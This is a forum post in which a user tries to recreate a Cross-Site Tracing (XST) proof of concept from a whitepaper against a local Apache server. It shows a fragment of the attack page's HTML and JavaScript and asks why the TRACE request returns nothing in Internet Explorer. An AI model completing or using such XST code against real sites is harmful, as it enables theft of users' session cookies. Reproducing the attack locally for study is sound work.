I'm trying to recreate a proof of concept XST attack. (http://www.cgisecurity.com/whitehat-...per_screen.pdf)

Here is what I'm doing:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

function XST(){
	var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
This page is at localhost/XST.html, and I have an apache server running. If I change TRACE to GET, the script works like it should (with a get request), however w.o that it won't return anything from the TRACE request. This is meant for IE, and it's not working. It's almost exactly the same as the PDF, I'm guessing I'm overlooking some skiddie-proof-inserted-intentional-bug that's throwing this off.

Anyways, I understand how XST works, but this isn't working like the whitepapers say it should (unless it's my fault... must be my fault).